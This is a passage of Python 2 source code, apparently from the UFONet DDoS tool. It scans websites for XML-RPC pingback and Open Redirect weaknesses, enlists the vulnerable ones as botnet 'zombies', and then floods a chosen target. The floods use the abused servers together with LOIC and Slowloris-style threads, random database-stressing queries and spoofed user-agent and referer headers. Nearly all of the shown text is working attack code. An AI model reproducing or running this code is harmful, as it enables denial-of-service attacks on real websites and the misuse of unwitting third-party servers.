remove_discarded_zombies(self, f, d, discarded, disc_zombies): m = [] for zombie_disc in discarded: if zombie_disc.endswith(os.linesep): zombie_disc = zombie_disc.replace(os.linesep, "") elif zombie_disc.endswith("\r"): zombie_disc = zombie_disc.replace("\r", "") elif zombie_disc.endswith("\r" + os.linesep): zombie_disc = zombie_disc.replace("\r" + os.linesep, "") for z in d: if z.endswith(os.linesep): z = z.replace(os.linesep, "") elif z.endswith("\r"): z = z.replace("\r", "") elif z.endswith("\r" + os.linesep): z = z.replace("\r" + os.linesep, "") if z == zombie_disc: disc_zombies = disc_zombies + 1 else: if z not in m and z not in discarded: m.append(z) if not m: f.write("") else: for z in m: f.write(z+os.linesep) return disc_zombies def testing_rpcs(self, rpcs): # discover/test XML-RPC Pingback vulnerabilities on webapps (Wordpress, Drupal, PostNuke, b2evolution, # Xoops, PHPGroupWare, TikiWiki, etc...) and update list if self.options.testall: #testing_all print '='*51 print ("Are 'plasma' reflectors ready? :-) (XML-RPC Check):") print '='*51 num_active_rpcs = 0 num_failed_rpcs = 0 rpcs_ready = [] print "Trying:", len(rpcs) print '-'*21 for rpc in rpcs: self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer if rpc.startswith("http://") or rpc.startswith("https://"): print "Searching 'Pingback' on", rpc rpc_host = rpc.replace("/xmlrpc.php", "") rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host) if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed rpc_methods = "system.listMethods" try: req = urllib2.Request(rpc_pingback_url, rpc_methods, headers) target_reply = urllib2.urlopen(req, context=self.ctx).read() if self.options.verbose: print "Reply:", target_reply if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed! print "\n[Info] It looks VULNERABLE !!! ;-)" rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie num_active_rpcs = num_active_rpcs + 1 # add fail to rpcs stats else: print "\n[Info] It is NOT vulnerable..." num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats except: print "[Error] X-RPC: " + rpc + " -> FAILED (cannot connect!)" num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats else: print "\n[Info] It is NOT vulnerable..." num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats print '-'*10 print '='*18 print "OK:", num_active_rpcs, "Fail:", num_failed_rpcs print '='*18 if self.options.testall: # testing_all return rpcs_ready, num_active_rpcs, num_failed_rpcs else: # update 'rpcs' list if num_active_rpcs == 0: print "\n[Info] - Not any vulnerable 'rpc' active!\n" return #sys.exit(2) else: if not self.options.forceyes: update_reply = raw_input("Want to update your army? (Y/n)") print '-'*25 else: update_reply = "Y" if update_reply == "n" or update_reply == "N": print "\nBye!\n" return #sys.exit(2) else: self.update_rpcs(rpcs_ready) if not self.options.upload: print "\n[Info] - Botnet updated! ;-)\n" def testing(self, zombies): # test Open Redirect vulnerabilities on webapps and show statistics # HTTP HEAD check army = 0 print ("Are 'they' alive? :-) (HEAD Check):") print '='*35 num_active_zombies = 0 num_failed_zombies = 0 active_zombies = [] print "Trying:", len(zombies) print '-'*21 for zombie in zombies: zombie = str(zombie) if zombie.startswith("http://") or zombie.startswith("https://"): # send HEAD connection self.head = True reply = self.connect_zombies(zombie) while self.herd.no_more_zombies() == False: time.sleep(1) for zombie in self.herd.done: zombie = str(zombie) t = urlparse(zombie) if self.herd.get_result(zombie): code_reply = self.herd.get_result(zombie) self.head = False if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405": name_zombie = t.netloc print "Zombie:", name_zombie print "Status: Ok ["+ code_reply + "]" num_active_zombies = num_active_zombies + 1 active_zombies.append(zombie) elif code_reply == "404": print "Zombie:", t.netloc print "Status: Not Found ["+ code_reply + "]" num_failed_zombies = num_failed_zombies + 1 else: print "Zombie:", t.netloc, "\nVector:", zombie print "Status: Not Allowed ["+ code_reply + "]" num_failed_zombies = num_failed_zombies + 1 else: if self.options.verbose: print "Reply:", "\n\nNothing!!!!!\n" print "Zombie:", zombie print "Status: Malformed!" num_failed_zombies = num_failed_zombies + 1 print '-'*10 self.herd.reset() print '='*18 print "OK:", num_active_zombies, "Fail:", num_failed_zombies print '='*18 + "\n" print '='*22 # check url parameter vectors print ("Checking for payloads:") print '='*22 print "Trying:", num_active_zombies print '-'*21 zombies_ready = [] num_waiting_zombies = 0 if num_active_zombies == 0: num_disconnected_zombies = num_failed_zombies else: num_disconnected_zombies = 0 for zombie in active_zombies: zombie = str(zombie) t = urlparse(zombie) name_zombie = t.netloc self.payload = True try: self.connect_zombies(zombie) except: pass self.payload = False time.sleep(1) while self.herd.no_more_zombies() == False: time.sleep(1) for zombie in self.herd.done: zombie = str(zombie) t = urlparse(zombie) name_zombie = t.netloc payload_zombie = zombie payload_reply = "" print "Vector:", payload_zombie self.payload = True if self.herd.get_result(zombie): payload_reply = self.herd.get_result(zombie) self.payload = False if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)] num_waiting_zombies = num_waiting_zombies + 1 print "Status:", "Waiting for orders..." zombies_ready.append(zombie) else: num_disconnected_zombies = num_disconnected_zombies + 1 print "Status:", "Not ready..." army = army + 1 print '-'*10 self.herd.reset() print '='*18 print "OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies print '='*18 + "\n" # list of 'zombies' ready to attack num_active_zombie = 0 for z in zombies_ready: t = urlparse(z) name_zombie = t.netloc num_active_zombie = num_active_zombie + 1 if self.options.verbose: print "Zombie [", num_active_zombie, "]:", name_zombie + "\n" if self.options.testall: # testing_all return zombies_ready, num_waiting_zombies, num_disconnected_zombies + num_failed_zombies else: print '-'*25 + "\n" print '='*24 print "Working 'zombies':", num_active_zombie print '='*24 if not self.options.forceyes: update_reply = raw_input("\nWant to update your army? (Y/n)") print '-'*25 else: update_reply = "Y" if update_reply == "n" or update_reply == "N": print "\nBye!\n" return #sys.exit(2) else: self.update_zombies(zombies_ready) if not self.options.upload: print "\n[Info] - Botnet updated! ;-)\n" self.update_scanner_stats(self.scanned_zombies) # update json file with scanner stats (found via dorking) def testing_all(self): # test whole botnet print ("\nChecking if ALL your zombies are still infected (WARNING: this may take serveral time!)\n") print '='*35 zombies = self.extract_zombies() rpcs = self.extract_rpcs() aliens = self.extract_aliens() droids = self.extract_droids() ucavs = self.extract_ucavs() try: botnet = zombies + rpcs + aliens + droids + ucavs tested_zombies = zombies + rpcs # test types supported: zombies + xml-rpcs except: return zombies_ready, num_waiting_zombies, num_disconnected_zombies = self.testing(zombies) rpcs_ready, num_active_rpcs, num_failed_rpcs = self.testing_rpcs(rpcs) print "\n" + '='*52 print "\n+ Total Botnet:", len(botnet) print "\n" + '-'*25 print "\n+ Total Tested:", len(tested_zombies) print "\n - Zombies :", len(zombies), " [ OK:", str(num_waiting_zombies), "| FAILED:", str(num_disconnected_zombies), "]" print " - XML-RPCs:", len(rpcs), " [ OK:", str(num_active_rpcs), "| FAILED:", str(num_failed_rpcs), "]" + "\n" print '='*52 + '\n' if num_disconnected_zombies > 0 or num_failed_rpcs > 0: if not self.options.forceyes: update_reply = raw_input("Want to update your army? (Y/n)") print '-'*25 else: update_reply = "Y" if update_reply == "n" or update_reply == "N": print "\nBye!\n" return #sys.exit(2) else: if num_disconnected_zombies > 0: self.update_zombies(zombies_ready) if num_failed_rpcs > 0: self.update_rpcs(rpcs_ready) if not self.options.upload: print "\n[Info] - Botnet updated! ;-)\n" else: print "[Info] ALL tested 'zombies' are working... Exiting!\n" def attacking(self, zombies): # perform a DDoS Web attack against a target, using Open Redirect vectors (and other Web Abuse services) as 'zombies' target = self.options.target if target.startswith("https://"): target = target.replace("https://", "http://") # change target to 'http' (to evade a possible invalid SSL certificate) if target.startswith("http://"): print "Attacking: ", target print '='*55, "\n" # send Open Redirect injection (multiple zombies > one target url) reply = self.injection(target, zombies) else: print "\n[Error] - Target url not valid! -> It should starts with 'http(s)://'\n" def stressing(self, target, zombie): # perform a DDoS Web attack against a target, requesting records on target's database db_input = self.options.dbstress def random_key(length): key = '' for i in range(length): key += random.choice(string.lowercase + string.uppercase + string.digits) return key # generating random alphanumeric queries if self.db_flash > 9: # set db flash start on: 10 length = 1024 # search a heavy random length query (db flash): 1024 self.db_flash = 0 # reset db flash counter else: length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db key = str(random_key(length)) if self.db_flash > 9: print "\n[Info] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)" else: print "\n[Info] Trying database request to: " + db_input + " | Query used: " + key self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer if not target.endswith('/'): # add "/" to end of target target = target + "/" url = zombie + target + db_input + key req = urllib2.Request(url, None, headers) try: req_reply = urllib2.urlopen(req).read() except urllib2.HTTPError, e: if e.code == 401: print '[Info] Not authorized' elif e.code == 404: print '[Info] Not found' elif e.code == 503: print '[Info] Service unavailable' else: print '[Info] Unknown error' else: print '[Info] DB query: Hit!' def attackme(self, zombies): # perform a DDoS Web attack against yourself print "Starting local port to listening at: " + self.port + "\n" print '='*21 + "\n" self.doll=Doll(self) self.doll.start() while not self.doll._armed: time.sleep(1) # send Open Redirect injection (multiple zombies-multiple target urls) target = "" self.injection(target, zombies) self.doll.shutdown() self.doll.join() self.herd.list_fails() def injection(self, target, zombies, head_check = True): options = self.options head_check_here = False head_check_external = False print '='*21 if options.disablehead: # check at start is disabled (skipping!) print "\n[Info] Skipping external check of target's status...\n" head_check_here = True head_check_external = True else: if head_check: if not options.attackme: print "Round: 'Is target up?'" print '='*21 try: # send HEAD connection self.head = True reply = self.connect_zombie(target) self.head = False if reply: print "[Info] From here: YES" head_check_here = True else: print "[Info] From Here: NO | Report: From here your target looks DOWN!" head_check_here = False except Exception: print "[Error] From Here: NO | Report: Check failed from your connection..." if self.options.verbose: traceback.print_exc() head_check_here = False else: # check if local IP/PORT is listening on mothership print "Round: 'Is NAT ready?'" print '='*21 try: sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) result = sock.connect_ex(('',8080)) if result == 0 or result == 110: # tmp black magic print "[Info] Local port: YES | Report: Mothership accesible on -private- IP:" head_check_here = True else: print "[Error] Local port: NO | Report: Something wrong on your port: 8080" head_check_here = False except Exception: print "[Error] Local port: NO | Report: Something wrong checking open port ;(" if self.options.verbose: traceback.print_exc() head_check_here = False print '-'*21 else: head_check_here = True # check target on third part service self.external = True if not options.attackme: try: external_reply = self.connect_zombie(target) if "It's just you" in external_reply: # parse from external service: http://www.downforeveryoneorjustme.com print "[Info] From exterior: YES" head_check_external = True else: # parse from external service: http://isup.me url = "http://isup.me/" + target self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer req = urllib2.Request(url, None, headers) req_reply = urllib2.urlopen(req).read() if 'is up' in req_reply: # parse external service for reply print "[Info] From exterior: YES" head_check_external = True else: print "[Info] From exterior: NO | Report: From external services your target looks DOWN!" head_check_external = False except Exception: print "[Error] From exterior: NO | Cannot reach external services from your network..." head_check_external = False else: try: # check mothership from public ip / NAT using HEAD request try: conn = httplib.HTTPConnection(str(self.pub_ip), 8080, timeout=10) conn.request("HEAD", "/") reply = conn.getresponse() except Exception: reply = None if reply: print "[Info] From exterior: YES | Report: Mothership accesible from Internet ;-)" head_check_external = True else: print "[Error] From exterior: NO | Report: Cannot access to mothership on -public- url:", target head_check_external = False head_check_here = False # stop attack if not public IP available except Exception: print "[Error] From exterior: NO | Report: Check failed from your connection..." head_check_here = False # stop attack if not public IP available if self.options.verbose: traceback.print_exc() head_check_external = False print '-'*21 self.external = False # ask for start the attack if head_check_here == True or head_check_external == True: if not self.options.forceyes: if not options.attackme: if not options.disablehead: start_reply = raw_input("[Info] Your target looks ONLINE!. Want to start a DDoS attack? (y/N)\n") else: start_reply = raw_input("[Info] Want to start a DDoS attack directly? (y/N)\n") else: if not options.disablehead: start_reply = raw_input("[Info] Your mothership looks READY!. Want to start a DDoS attack against yourself? (y/N)\n") else: start_reply = raw_input("[Info] Want to start a DDoS attack against yourself directly? (y/N)\n") else: start_reply = "Y" if start_reply == "y" or start_reply == "Y": if options.attackme: total_rounds = "2" # default rounds for attackme else: total_rounds = options.rounds # extract number of rounds if total_rounds <= "0": total_rounds = "1" self.herd.cleanup() num_round = 1 num_hits = 0 num_zombie = 1 # start multi-threading DoS Web LOIC (Low Orbit Ion Cannon) with proxy support, if required if self.options.loic: try: self.options.loic = int(self.options.loic) except: self.options.loic = 100 # default LOIC requests if self.options.loic < 1: self.options.loic = 100 # default LOIC requests self.instance = LOIC() # instance main class for LOIC operations t = threading.Thread(target=self.instance.attacking, args=(target, self.options.loic, self.options.proxy)) # attack with LOIC t.daemon = True t.start() self.update_loic_stats() # add new LOIC attack to mothership # start multi-threading DoS Slow+Poison HTTP requests (UFOLoris) if self.options.slow: try: self.options.slow = int(self.options.slow) except: self.options.slow = 101 # default UFOLoris requests (apache -> max_clients: ~100 | nginx -> no limit (other method)) if self.options.slow < 1: self.options.slow = 101 # default UFOLoris requests self.instance = LORIS() # instance main class for UFOLoris operations t = threading.Thread(target=self.instance.attacking, args=(target, self.options.slow)) # attack with UFOLoris t.daemon = True t.start() self.update_loris_stats() # add new LORIS attack to mothership time.sleep(5) # start to attack the target with each zombie zombies = self.extract_zombies() # extract zombies from file total_zombie = len(zombies) self.herd=Herd(self) for i in range(0, int(total_rounds)): print ("\x1b[2J\x1b[H")# clear screen (black magic) print '='*42 print 'Starting round:', num_round, ' of ', total_rounds print '='*42 if not self.options.disablealiens and not self.options.attackme: # different layers requests -> pure web abuse send_aliens = self.send_aliens(target) if not self.options.disabledroids and not self.options.attackme: # GET (with parameter required) requests send_droids = self.send_droids(target) if not self.options.disablerpcs and not self.options.attackme: # exploit XML-RPC pingback vulnerability send_rpcs = self.send_rpcs(target) shuffle(zombies) # suffle zombies order, each round :-) self.herd.reset() print "\n[Info] Sending your 'herd' of zombies...\n" for zombie in zombies: t = urlparse(zombie) name_zombie = t.netloc if not self.options.attackme: print "[Info] Attacking from: " + name_zombie else: # on attackme target url is dynamic -> http://public_ip:port/hash|zombie self.mothership_hash = random.getrandbits(128) # generating random evasion hash target = "http://" + str(self.pub_ip) + ":" + self.port + "/"+ str(self.mothership_hash) + "|" + zombie self.options.target = target print "Attacking: " + str(self.pub_ip) + ":" + self.port + " -> [LAN]" + self.local_ip + ":" + self.port print "Payload: " + target print '='*55, "\n" self.attack_mode = True self.user_agent = random.choice(self.agents).strip() # suffle user-agent if not options.target.startswith('http'): options.target = "http://" + options.target self.connect_zombies(zombie) if self.options.dbstress: # try to stress db on target by using vulnerable Open Redirect web servers self.db_flash = self.db_flash + 1 stress = self.stressing(target, zombie) time.sleep(1) for zombie in self.herd.done: if self.herd.connection_failed(zombie) == False: num_hits = num_hits + 1 num_zombie = num_zombie + 1 if num_zombie > total_zombie: num_zombie = 1 while self.herd.no_more_zombies() == False: time.sleep(1) num_round = num_round + 1 if not self.options.disableisup and not self.options.attackme: # perform an external 'is target up?' check check_is_up = self.check_is_up(target) print "-"*21 self.herd.dump_html() attack_mode = False print ("\x1b[2J\x1b[H") # black magic if not self.options.attackme: # show herd results self.herd.dump() else: # show doll results print '='*21 print "\n[Info] - Mothership transmission...\n" num_real_zombies = len(self.doll.real_zombies) print "Total 'zombies' 100% vulnerable to Open Redirect (CWE-601): " + str(num_real_zombies) + "\n" for z in self.doll.real_zombies: # show only alien verified zombies for x in z: print " - " + str(x) self.herd.dump_html(True) # show (all) zombies statistics if not self.options.attackme: print "\n[Info] - Attack completed! ;-)\n" self.update_mothership_stats() # update mothership stats else: if num_real_zombies < 1: # not any 100% vulnerable zombie found print "\n[Info] - Not any 100% vulnerable zombie found... Bye!\n" if os.path.exists('mothership') == True: os.remove('mothership') # remove mothership stream if os.path.exists('alien') == True: os.remove('alien') # remove random alien worker sys.exit(2) else: print "\nBye!\n" if os.path.exists('mothership') == True: os.remove('mothership') # remove mothership stream if os.path.exists('alien') == True: os.remove('alien') # remove random alien worker if not options.web: sys.exit(2) # exit else: return else: if not options.attackme: print "[Info] Your target ("+target+") is OFFLINE!! ;-)" else: print "[Error] Your NAT/Network is not correctly configurated..." print '-'*25 print "\nBye!\n" if os.path.exists('mothership') == True: os.remove('mothership') # remove mothership stream if os.path.exists('alien') == True: os.remove('alien') # remove random alien worker if not options.web: sys.exit(2) # exit else: return if __name__ == "__main__": app = UFONet() options = app.create_options() if options: app.run()